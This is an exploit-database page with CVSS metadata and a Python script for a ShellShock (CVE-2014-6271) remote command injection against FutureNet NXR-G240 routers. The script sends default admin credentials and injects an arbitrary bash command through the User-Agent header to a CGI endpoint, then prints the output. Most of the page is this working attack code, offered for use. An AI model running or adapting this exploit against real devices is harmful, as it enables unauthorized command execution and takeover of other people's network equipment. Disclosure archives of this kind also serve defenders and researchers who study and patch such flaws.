FutureNet NXR-G240 Series ShellShock Command Injection

2018.12.09
Credit: Nassim Asrir
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# -*- coding: utf-8 -*- # Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection # Date: 2018-06-12 # Author: Nassim Asrir # You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/ # Vendor: http://www.centurysys.co.jp/ # CVE: CVE-2014-6271 # Greetz to : Nadia BENCHIKHA for the great help. # Example: # [root@parrot]a[/home/sniperpex/Desktop] # #python ./exploit.py http://server -u admin -p admin -c ps import urllib2 import base64 import bs4 import sys import argparse reload(sys) sys.setdefaultencoding('utf8') ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ") ap.add_argument("host", help="(Example: http://127.0.0.1).") ap.add_argument("-u", "--user", help="Admin username (Default: admin)") ap.add_argument("-p", "--password", help="Admin password (Default: admin)") ap.add_argument("-c", "--cmd", help="Command to run.") args = ap.parse_args() request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute") base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '') print '[+] Authentication & Exploit in progress...' request.add_header("Authorization", "Basic %s" % base64string) request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd)) response = urllib2.urlopen(request) soup = bs4.BeautifulSoup(response, 'html.parser') for textarea in soup.find_all('pre'): print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top